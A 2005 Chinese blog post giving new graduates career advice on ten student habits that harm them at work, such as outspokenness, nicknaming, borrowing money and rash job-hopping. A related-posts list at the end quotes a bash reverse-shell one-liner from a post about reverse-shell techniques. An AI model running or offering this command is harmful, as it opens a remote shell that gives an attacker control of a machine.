自毁前程的十种学生习气

原创 2005年05月05日 14:04:00

什么《职场战术》、《办公室关系学》之类,一直是写字楼里的畅销书。刚毕业的学生想不起来买,买了也看不进去。总觉得那是给老江湖们看的,凭着咱的学历、活力和创造力,看那些劳神的东西做甚?

殊不知,十几年学上下来,很多事情已经习惯成自然了,正是这些自然的不能再自然的“学生习气”不仅是你刚上班时的绊马索,也往往是工作多年的师兄师姐免不了为之喝一壶的地方。

莺歌燕舞的日子

上学的时候想踢球,随时有一大帮兄弟奉陪;想睡觉,倒床就睡,管他下午有没有课;想唱歌,嚎他个通宵,既便宜又痛快,反正明天可以狂睡一天……如果你上班还是带着这种生活印记,那可糟了:整天工作都忙得晕头转向,晚上还敢去唱歌、跳舞?不让你加班就谢天谢地了!白天在单位要是困得不行了,你也得拿根棍儿撑着,如果你不小心倒在桌子上,不惹来领导几个白眼才怪呢!到了晚上,再也不敢挂着QQ熬到一两点钟,即使对方多么让你心仪,你都得早早说bye-bye,你终于意识到,睡眠对你来说比聊天更重要。

直肠子刺头

在大学里,你想说什么就说什么,什么制度不合理,什么老师教授的方式有问题,什么“公车上书”了,什么“上殿谏言了”,没有不敢做的,那叫有个性、有气魄,没准还能惹来老师的另眼相看,把你器重成个人才。可是,上了班你就会发现,“人人平等”变成了下级和上级不可逾越的界限,“言论自由”变成了尽可能的服从。你要是想施展自己的个性、魅力,就要先学会去适应。不然,动不动的就对制度提出怀疑,动不动就“上书”一把,到时候只能是搬起石头砸自己脚,能不能保住这个饭碗都是个问题。

起外号不是魅力是阻力

学生时代是少不了外号的,而且一定要有特点,做到既可意会,又方便言传。头发少的老师,就起名为“地中海”,严厉的女老师,命名为“小魔女”,从来不笑的老师,来个“黑脸包公”,反正是五花八门,叫起来既顺口,又显得亲切。这一顺口就顺了十几年,到了单位都有点适应不过来。你的部门经理可不会因为亲切的缘故对它置之不理,走运的话骂你两句了事,背运的话,给你打发走了你还不知道怎么回事呢。所以就是再艺术、再搞笑、再有创意的外号,也得把它留在脑子里,烂在肚子了,自己想想偷着笑。千万别放出风来以求和同事达成共鸣,况且办公室的年龄参差不齐,你的创意也未必能得到共识!

邋遢不再是潇洒

工作的环境可不像你温暖的家和可以大闹天宫的宿舍!刚来的时候,就勤快着点,不仅自己的办公地带要保持干净整洁,还得有点眼里见儿,擦擦桌子,打打水,碰上陪领导吃饭的时候,自己少吃点,多照顾照顾别人,没准前辈们觉得这孩子挺懂事的,多教你两招,你不是就赚大发了嘛。

向同事借钱想都不要想

谁没跟同学借过钱,“唉,哥们,这月揭不开锅了,借几个子儿使使”,一点都不陌生吧。同学一般都很给面子,大家都没几两银子,花也花不到哪去。上了班,挣了钱,有了固定收入,就别过那种月初“富翁”,月末“负翁”的日子了。同事≠同学,你开口容易,人家却两难。

逗贫嘴

每天在宿舍里贫嘴,从来没停过吧。进了办公室,屋里的人比寝室多了两倍,但很可能从早到晚说的话,不超过5句。不适应吧,那是肯定的。对于刚毕业的学生,最聪明的做法就是少说多干。

恋爱稍微悠着点

在大学生活中,恋爱也是一门不可逃避的必修课,到处都充斥着爱情的味道,大胆的表白或无微不至的体贴,不但不会招来白眼,反而会有掌声。但上了班,可千万得悠着点,打给恋人的电话最好每天少于一个,别以为你压低了声音人家就不知道!没事恋人就来造访,更是一大忌讳。毕竟在单位里,工作还是第一位的,恋爱,还是选择优雅、浪漫的地方去实践吧。

发现幻想不再迷人也别沦为愤青

毕业之前,每个人都会在校友录上慷慨激昂一番,什么一定要做出个人样,不能给母校丢脸;什么要在几年之内年薪达到多少多少;什么要通过自己的努力让领导刮目相看。也许刚上班的时候,你兴奋得每天6点起,12点睡却仍然精力充沛;你看到每一个同事脸上都堆上了亲人般的笑容;你干起活来非常认真,脑子里幻想着被领导表扬的情景。但是,你渐渐就会发现,理想和现实原来差距是如此遥远,你知道每天6个小时的睡眠远远不够,你发现你的提议总是得不到认可,你发觉到就是整天堆着笑脸也会有人不买你的账……然后,你所能做的就是尝试着去冷静的泰然处之,抱怨是没有用的,只会让你的态度更加消极,社会就是这样的,既然你没有力量去改变它,就想办法去适应它吧,等你渐渐的适应了以后,也许你可以改变点什么!

意气用事的跳槽

“我准备跳槽了”这句话往往在毕业一两年后的同学聚会上被提及率很高。原来心满意足的工资现在看起来少得可怜;时间、经历的付出和所得到的成果不成正比;讨厌自己现在的状态,觉得学不到什么东西了……几个小时过后,大家得出一致结论“其实想找个比现在工作好的地方也挺难的!”工作需要积累,关系需要培养,在你还没有大能耐的时候,还是本分点好,说不定积累个几年,你跳的优势会更好。要是像蚂蚁似的天天搬家,最后你还是个打杂的。凡事有失必有得,卧薪尝胆,必有后用。

眼里不揉沙子的暴脾气

上完了大学,尤其是那种给学校撑面子的学生,往往骨子里都带着清高和不忿儿。可到了单位,哪有人把你放在眼里?就是每天勤勤恳恳的,没准还能招来两句“你这东西怎么做的,不会做就别做!”你要是不忍,脱口而出:“我还不愿意做呢!”等于把自己逼上了绝路,还没留台阶。

职场:自毁前程的十种学生习气

什么《职场战术》、《办公室关系学》之类,一直是写字楼里的畅销书。刚毕业的学生想不起来买,买了也看不进去。总觉得那是给老江湖们看的,凭着咱的学历、活力和创造力,看那些劳神的东西做甚?殊不知,十几年学上下...
  • IT_zen
  • IT_zen
  • 2007年04月12日 10:57
  • 862

反弹shell的十种姿势

bash版本: bash -i >& /dev/tcp/10.0.0.1/8080 0>&1 ,注意这个是由解析shell的bash完成,所以某些情况下不支持 perl版本: perl -e ‘...
  • u013648937
  • u013648937
  • 2016年03月07日 11:44
  • 418

十种常见的排序算法

1.常见算法分类十种常见排序算法一般分为以下几种: (1)非线性时间比较类排序:交换类排序(快速排序和冒泡排序)、插入类排序(简单插入排序和希尔排序)、选择类排序(简单选择排序和堆排序)、归并排序(...
  • a20180825
  • a20180825
  • 2017年08月03日 10:12
  • 10884

LVS十种调度算法介绍

转自:12 1.轮叫调度(Round Robin)(简称rr)        轮叫调度(Round Robin Scheduling)算法就是以轮叫的方式依次将请求调度不同的服务器,即每次调度执行i...
  • xygl2009
  • xygl2009
  • 2015年03月14日 22:25
  • 820

十种常用的设计模式(大部分自己总结,部分摘抄)

最近公司需要重构一下老项目,所以重新总结了下一些常用的设计模式。(有些内容摘自互联网)...
  • dean_hu
  • dean_hu
  • 2017年05月05日 13:29
  • 1177

感情与技术

 感情与技术       感情是一种感受,因此主观性更强。而技术是客观的,不因外物的改变而发生任何变化。有时候,人,就没有去控制感情,当然有可能是根本不知道这一点。情人眼里出西施。但却没有人,哪怕是最...
  • netlius
  • netlius
  • 2006年10月11日 23:26
  • 436

中国大学里的十种傻学生

 大学四年是人生中值得好好付出,好好珍惜的岁月。尽管来时的路,犯下了种种错误,我们依然有理由对未来充满信心。杨澜曾说:我们年轻,不是因为青春,而是因为我 们有犯错误并改正的机会。对比下面的文字,有则改...
  • zhaozheng7758
  • zhaozheng7758
  • 2009年02月28日 18:48
  • 758

大学校园里的十种傻学生【比照】

大学四年是人生中值得好好付出,好好珍惜的岁月。尽管来时的路,犯下了种种错误,我们依然有理由对未来充满信心。杨澜曾说:我们年轻,不是因为青春,而是因为我们有犯错误并改正的机会。   第一种傻学生:  课...
  • jamestaosh
  • jamestaosh
  • 2009年05月08日 12:06
  • 577

自毁前程的七种行为

职场里有句话:「不打勤,不打懒,专打不长眼。」这些不长眼的白目职场人现在有个新绰号──「职场小白」,这些人不是状况外,就是「千错万错,反正都不是我的错」;职场新人们可千万不要成为小白,免得自毁前程!...
  • wstarx
  • wstarx
  • 2007年11月23日 09:55
  • 1987

10种女人最讨厌

1、酗酒抽烟的女人   女人天生就是一种优雅的动物,然而酗酒抽烟的女人却是这个世界上最疯狂的一种人之一,她们以为这样很厉害,其实在大多数男人心目中,她们把自己搞到狼狈不堪,甚至丑陋无比。   女人抽烟...
  • wangzheaoxiang
  • wangzheaoxiang
  • 2009年08月27日 23:16
  • 107
内容举报
返回顶部
收藏助手
不良信息举报
您举报文章:自毁前程的十种学生习气
举报原因:
原因补充:

(最多只允许输入30个字)